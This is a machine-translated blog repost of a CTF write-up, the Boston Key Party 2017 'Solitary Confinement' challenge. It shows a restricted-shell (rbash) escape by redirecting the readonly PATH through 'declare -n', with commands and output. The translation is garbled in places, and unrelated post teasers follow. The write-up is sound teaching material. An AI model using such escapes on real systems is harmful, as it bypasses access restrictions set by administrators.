What to do if you are locked in rbash

just recently, another interesting CTF Boston Key Party 2017. We unfortunately didn't win, but that's another story. And today I would like to describe the solution of one task from section pwn "Solitary Confinement (pwn 99)".

By connecting SSH we immediately come to rbash.

Looking around, it becomes clear that available for the execution of files through which they could come in was normal, we have:

the 
rbash-4.3$ [tab]
! ]] builtin compgen declare echo eval in the logout fc getopts pwd readonly typeset shopt time until
alias complete caller elif dirs exec fg jobs hash mapfile return source ulimit wait times
bg disown compopt case else exit fi help kill popd rbash select suspend trap umask while
[ bind cd continue do enable export for history let printf  read  set test to true unalias {
[[ coproc command break done esac function if false local pushd readarray shift then type unset }

Further looking around in the system:

the 
-rbash-4.3$ pwd
/

Understand that we are in the root directory! First thought — It's great! But look further:

the 
-rbash-4.3$ echo ./*
bin dev lib lib64 flag
-rbash-4.3$ echo ./bin/*
rbash
-rbash-4.3$ echo ./flag/*
showFlag

Well, at least we know where the flag is. But it is not all that just by looking at the attributes of the file:

the 
-rbash-4.3$ if [[ -r flag/showFlag ]]; then echo ok; fi
-rbash-4.3$ if [[ -x flag/showFlag ]]; then echo ok; fi
ok
-rbash-4.3$ if [[ -G flag/showFlag ]]; then echo ok; fi
-rbash-4.3$ if [[ -O flag/showFlag ]]; then echo ok; fi

Understand that it is binary, so also not ours. So how to use / execute commands are prohibited, as well as to change to use cd. Then I had to figure out how to change the variable PATH.

the 
rbash-4.3$ unset -v PATH
rbash: unset: PATH: cannot unset: readonly variable

To edit environment variables in the following way:

the
    the
  • set PATH=deadbeef
    • the
  • typeset PATH=deadbeef
    • the
  • export PATH=deadbeef
    • the
  • PATH=deadbeef
    • the
  • declare PATH=deadbeef

After careful consideration of the documentation to each command, you can stumble upon this interesting snippet:
declare: declare [-aAfFgilnrtux] [-p] [name[=value] ...]
Set variable values and attributes.
...
-n make NAME a reference to the variable named by its value

Hmm, since you cannot change the variable directly, we will try to create a link:

the 
rbash-4.3$ declare-n PATH
rbash-4.3$ export PATH=/flag

There are no errors. Check the changes:

the 
rbash-4.3$ echo $PATH
/flag
rbash-4.3$ showFlag
BKP{vimjail_is_down,_fortunately_we_have_rbash_to_save_the_day}

The flag we have. Job passed. In the presence of for example bash's, it would be possible to run it in the same way.
Article based on information from habrahabr.ru

Комментарии

Отправить комментарий

Популярные сообщения из этого блога

Why I left Google Zurich

the Backstory The question I often hear from different people and now I will try to answer it. Probably for anybody not a secret, but still: how does Google? They recruit the best engineers pay them large enough (even for Switzerland) salary and create an amazing environment for work, free food, massage at the office, the phantasmagoric recreation area , childrens slide down directly into the dining room, etc. This is very cool, like to write journalists, but it doesn't matter. Well, how many times will you walk down the hall on the hill and is it important? Free food has led to the fact that the majority of Googlers fat pounds five after a job, thus denying yourself the pleasure to go to lunch every day in a new restaurant. What's more determines how good you feel at work, free food, massage, design zones, the rest or the work that you do? I'm sure that's really important what you do every day and how this activity brings joy. Google hires the b
Далее...

2000 3000 icons ready — become a sponsor! (the table of orders)

Изображение
Not so long ago on habré was top that led you to our website 17 thousand visitors for two days (11,828+5,100 on October 21, 2010). With new year 2009 this is not the first wave, and the last icons will be drawn in the first quarter of 2012. Best reseller hosting providers . Not enough more 1000 icons for best email hosting . Are you willing to offer metaphors, of which we still have not enough? Then follow me... Gebrettert from 17K inferior reddit 49k (but for four days), but still is a decent part of the order of 200k visitors who have downloaded a set. Initially I just wanted to beat set Yusuke , then not counted, and 2000 icons and there was only 16m in size. Now I just want to make the largest (and having the maximum number of unique metaphors) set of icons in the world . Well, a few minnamoro like these 2 for wordpress admin . Today drawn 2040 icon, cut 2000 more smoothly. I want to draw flags and more file type icons, but still pieces of 40
Далее...

New web-interface for statistics and listen to the calls for IP PBX Asterisk

Изображение
the Idea of writing web-interface for statistics and listen to the calls for IP PBX Asterisk is not left me for several years now. The solutions found in Internet, are not satisfied on certain criteria — somewhere lacked functionality, some of them are not pleasing to the eye. And so, armed with technology stack and riding warhorse provided by ServerClub I went. The result of my journey has become a new interface , with charts, graphs and the ability to download and listen to the calls. I will not further bore you with words, here are a couple of screenshots: And under the cut are waiting for you a video guide on the interface, necessary settings and detailed description of the available functionality. the Interface. That post didn't look like a bed sheet from the screenshots, I made a little slideshow where you can see the interface. Description. The already existing plans. Currently implemented the following functionality: Incoming calls:
Далее...